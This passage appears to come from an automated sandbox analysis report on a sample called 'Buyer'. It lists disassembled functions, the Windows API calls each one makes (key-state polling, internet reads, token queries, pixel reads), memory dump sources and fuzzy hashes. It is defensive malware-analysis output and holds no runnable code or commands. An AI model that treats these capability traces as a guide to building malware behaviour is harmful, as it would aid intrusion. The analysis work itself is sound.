                                                                                                      • Part of subcall function 00F5FAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00FA00EB,00000000,00000000,?,?,00FB172C,?,7529E610,?,00FA00EB), ref: 00F5FB0A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 666041331-0
                                                                                                    • Opcode ID: 2dda54b5023d16e1e134b986d7ece338a5a1346f1444595608342b83ca5740da
                                                                                                    • Instruction ID: 4a26c2f53adee062f25f09a614f98b7ca7391505147864ee97b73beb3e07fead
                                                                                                    • Opcode Fuzzy Hash: 2dda54b5023d16e1e134b986d7ece338a5a1346f1444595608342b83ca5740da
                                                                                                    • Instruction Fuzzy Hash: 33517C35A05206DFCB00DF58C595D99BBF1FF09324B048099E81A9B762C775ED86EF81
                                                                                                    Function 00FD7241 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FD72FE
                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00FD7315
                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FD733E
                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00FBB2E8,00000000,00000000), ref: 00FD7363
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FD7392
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3688381893-0
                                                                                                    • Opcode ID: 3efe72b8c63fd6ef35ddebe3b22bf91bcd727fd52115aa9737136c02449e3f8a
                                                                                                    • Instruction ID: 0e38ff17f2c0c861b7882f7c9045f74279ac98195f04670e4989d56010d28041
                                                                                                    • Opcode Fuzzy Hash: 3efe72b8c63fd6ef35ddebe3b22bf91bcd727fd52115aa9737136c02449e3f8a
                                                                                                    • Instruction Fuzzy Hash: 7941B135A08244ABD724EF68CC44FA97B66EB05360F180266F859AB3A0E370AD01FA50
                                                                                                    Function 00F72311 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: d6c4d2688917687fb5a369ea2fa5debf26bae1a4005355e528e6986675f03e63
                                                                                                    • Instruction ID: e009ddebaec5f74f7747f6c7e708124cf5fe51b6609313ecd2df6162a40704d5
                                                                                                    • Opcode Fuzzy Hash: d6c4d2688917687fb5a369ea2fa5debf26bae1a4005355e528e6986675f03e63
                                                                                                    • Instruction Fuzzy Hash: 8141C436E002009FCB60DF78CC81A5EB3E5EF89714F15859AE519EB351D735AD01EB82
                                                                                                    Function 00F4135A Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32(?), ref: 00F4136E
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00F4138B
                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00F413C2
                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00F413DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4210589936-0
                                                                                                    • Opcode ID: 7b2f389d238d5c31c09bd35727b73d0a6d244b3c9165cce2d8fb65a56bc5d5dd
                                                                                                    • Instruction ID: d0839c7eeaa6907e7437e6c5247f99fb99d8ee1aad09d930faf71b1dadb9ff87
                                                                                                    • Opcode Fuzzy Hash: 7b2f389d238d5c31c09bd35727b73d0a6d244b3c9165cce2d8fb65a56bc5d5dd
                                                                                                    • Instruction Fuzzy Hash: 67419171A0411AFBDF05EF64C844BEEBB74FF05324F24822AE825A32A0C7346994EB51
                                                                                                    Function 00FBD689 Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00FBD6A7
                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00FBD6DE
                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00FBC98D,00000000), ref: 00FBD723
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00FBC98D,00000000), ref: 00FBD737
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00FBC98D,00000000), ref: 00FBD761
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 3191363074-0
                                                                                                    • Opcode ID: 3b8590a4e19435b9eef8068c8439b5e4ec65cd7da8b387a21c69cbb5c94b36d0
                                                                                                    • Instruction ID: b3a9f4e3a0e6d6756fc3a15bc560b25d215d9885caa9a535819eb894e12bf156
                                                                                                    • Opcode Fuzzy Hash: 3b8590a4e19435b9eef8068c8439b5e4ec65cd7da8b387a21c69cbb5c94b36d0
                                                                                                    • Instruction Fuzzy Hash: 6B312171900209AFDB24DFA6DC85AEFB7F9EB05364B20446EE406D3550EB34AD41EF61
                                                                                                    Function 00FC10B7 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(00000000), ref: 00FC10D8
                                                                                                    • GetForegroundWindow.USER32 ref: 00FC10EF
                                                                                                    • GetDC.USER32(00000000), ref: 00FC112B
                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00FC1137
                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00FC116F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 4156661090-0
                                                                                                    • Opcode ID: ffa63d12fabb5a4228883a6d368db5cfb59e7f55144667eca847c954b4dc3b88
                                                                                                    • Instruction ID: 95e2e821cc961c3b5d400828c749f20853e5717ec93d5632c89f182f452b98d1
                                                                                                    • Opcode Fuzzy Hash: ffa63d12fabb5a4228883a6d368db5cfb59e7f55144667eca847c954b4dc3b88
                                                                                                    • Instruction Fuzzy Hash: 87218135A01214AFD704EFA5CC95E9A7BFAEF49300B04806DE85A97352DB34ED40EF90
                                                                                                    Function 00F7D10E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00F7D117
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F7D13A
                                                                                                      • Part of subcall function 00F73B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F66A59,?,0000015D,?,?,?,?,00F68590,000000FF,00000000,?,?), ref: 00F73BA2
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F7D160
                                                                                                    • _free.LIBCMT ref: 00F7D173
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F7D182
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: 60d86a265836defc5a5c41759cdd6aa68484b845e9b61ea204679316dc06d314
                                                                                                    • Instruction ID: c2db2840019f443c42e989632b180212ac98a333efcc81220bada634349571b2
                                                                                                    • Opcode Fuzzy Hash: 60d86a265836defc5a5c41759cdd6aa68484b845e9b61ea204679316dc06d314
                                                                                                    • Instruction Fuzzy Hash: E6018DB29012157F332156765C8CD7B7A7DDFCABB0395411BB908D3121DAA48C0171B2
                                                                                                    Function 00F5986F Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F598C9
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F598D8
                                                                                                    • BeginPath.GDI32(?), ref: 00F598EF
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F59918
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3225163088-0
                                                                                                    • Opcode ID: 9e5ea0c825079b46af48786a9eb5e4127f4f2f246d6dc5b92c03c7030e2a183c
                                                                                                    • Instruction ID: 6d9381adf60a6a155699e10b3b687dada363f5f371357c7fb63b2cecf2ab86db
                                                                                                    • Opcode Fuzzy Hash: 9e5ea0c825079b46af48786a9eb5e4127f4f2f246d6dc5b92c03c7030e2a183c
                                                                                                    • Instruction Fuzzy Hash: 3521C53080A309EFDF259F18D8057697B67FB423B7F24421EF95496094C3B94985EB90
                                                                                                    Function 00F73148 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(0000000A,?,?,00F72B6D,00F6543F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F7314D
                                                                                                    • _free.LIBCMT ref: 00F73182
                                                                                                    • _free.LIBCMT ref: 00F731A9
                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F731B6
                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F731BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 5494ce203d76485b9ce91b12f4c80e4272b19f693732140e323b2fe07bfd8e53
                                                                                                    • Instruction ID: 7ab5a59cf3b89a0bf1a287dcc1deec344db0ee85261d432f89da5cf249a25d2a
                                                                                                    • Opcode Fuzzy Hash: 5494ce203d76485b9ce91b12f4c80e4272b19f693732140e323b2fe07bfd8e53
                                                                                                    • Instruction Fuzzy Hash: CC01F477A0160177D22277796C49EAB376AABC1370B61C12BF81D92141EFA98E057263
                                                                                                    Function 00FA0695 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?,?,00FA09E5), ref: 00FA06B2
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06CD
                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06DB
                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?), ref: 00FA06EB
                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06F7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3897988419-0
                                                                                                    • Opcode ID: a8f57ef0246428c17f4cc1a169bb1214467c1a9d805f8828881f892721496c6d
                                                                                                    • Instruction ID: f38870456ae864402cde5b751971172868978e5d6a1f3e41af12f14bcdcac478
                                                                                                    • Opcode Fuzzy Hash: a8f57ef0246428c17f4cc1a169bb1214467c1a9d805f8828881f892721496c6d
                                                                                                    • Instruction Fuzzy Hash: AE018BB2A01218AFDB115F64EC48B9A7BAEEF897A5F144025F905D6210EB70DD50BBA0
                                                                                                    Function 00FAEFBC Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00FAEFD8
                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00FAEFE6
                                                                                                    • Sleep.KERNEL32(00000000), ref: 00FAEFEE
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00FAEFF8
                                                                                                    • Sleep.KERNEL32 ref: 00FAF034
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                    • String ID:
                                                                                                    • API String ID: 2833360925-0
                                                                                                    • Opcode ID: 62bbc79ea88b1964ce3f8dac93b739b26f0a4ab793c7f4b433c82c64b2d20ae1
                                                                                                    • Instruction ID: bf44a9b3510c10e6a1cb80b4a939240968ad68edf8ee2e915208a95c96a05e11
                                                                                                    • Opcode Fuzzy Hash: 62bbc79ea88b1964ce3f8dac93b739b26f0a4ab793c7f4b433c82c64b2d20ae1
                                                                                                    • Instruction Fuzzy Hash: D60157B1C0261DEBDF00AFF4DC48AEDBBB9FB0A311F014156E502B2241CB309554E761
                                                                                                    Function 00FA17DB Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FA17F6
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1802
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1811
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1818
                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FA182F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 842720411-0
                                                                                                    • Opcode ID: 138a32abe86fc881a6368aa49be39ad162865800fa475844eb2628704c61d90c
                                                                                                    • Instruction ID: 7fae1817dcad470ae5531f2be6f24e4badf30b2dcb8dbcc86a08ccc61ce96ffb
                                                                                                    • Opcode Fuzzy Hash: 138a32abe86fc881a6368aa49be39ad162865800fa475844eb2628704c61d90c
                                                                                                    • Instruction Fuzzy Hash: E1018CB5601209BFDB114FB4DC48E6A3B6EFF8A3A0F290425F885C3260DA31DC40EA60
                                                                                                    Function 00FA16F6 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FA170C
                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FA1718
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA1727
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA172E
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA1744
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 44706859-0
                                                                                                    • Opcode ID: 8d1fdbba8b3cbf16731a352b3cc2cf26547c0fa7496bd3debf73492fd15e95cd
                                                                                                    • Instruction ID: afcf2c99e7908d16c916ad6ef912cfcf5a05a854db73bcf454652629d682a90e
                                                                                                    • Opcode Fuzzy Hash: 8d1fdbba8b3cbf16731a352b3cc2cf26547c0fa7496bd3debf73492fd15e95cd
                                                                                                    • Instruction Fuzzy Hash: 01F06DB9241309BBDB121FB4EC4DF573BAEFF8A760F110416FA45C72A1CA70D810AA60
                                                                                                    Function 00FA1696 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FA16AC
                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FA16B8
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FA16C7
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FA16CE
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FA16E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 44706859-0
                                                                                                    • Opcode ID: e684f1022bec519fcbac1fea27aafd992daaf19df8d0f083bd706c43c0afffde
                                                                                                    • Instruction ID: 7f57bdf0b306319d3563113bfee2340b8f6dfb6508ba3a980f1f21ae8a19425d
                                                                                                    • Opcode Fuzzy Hash: e684f1022bec519fcbac1fea27aafd992daaf19df8d0f083bd706c43c0afffde
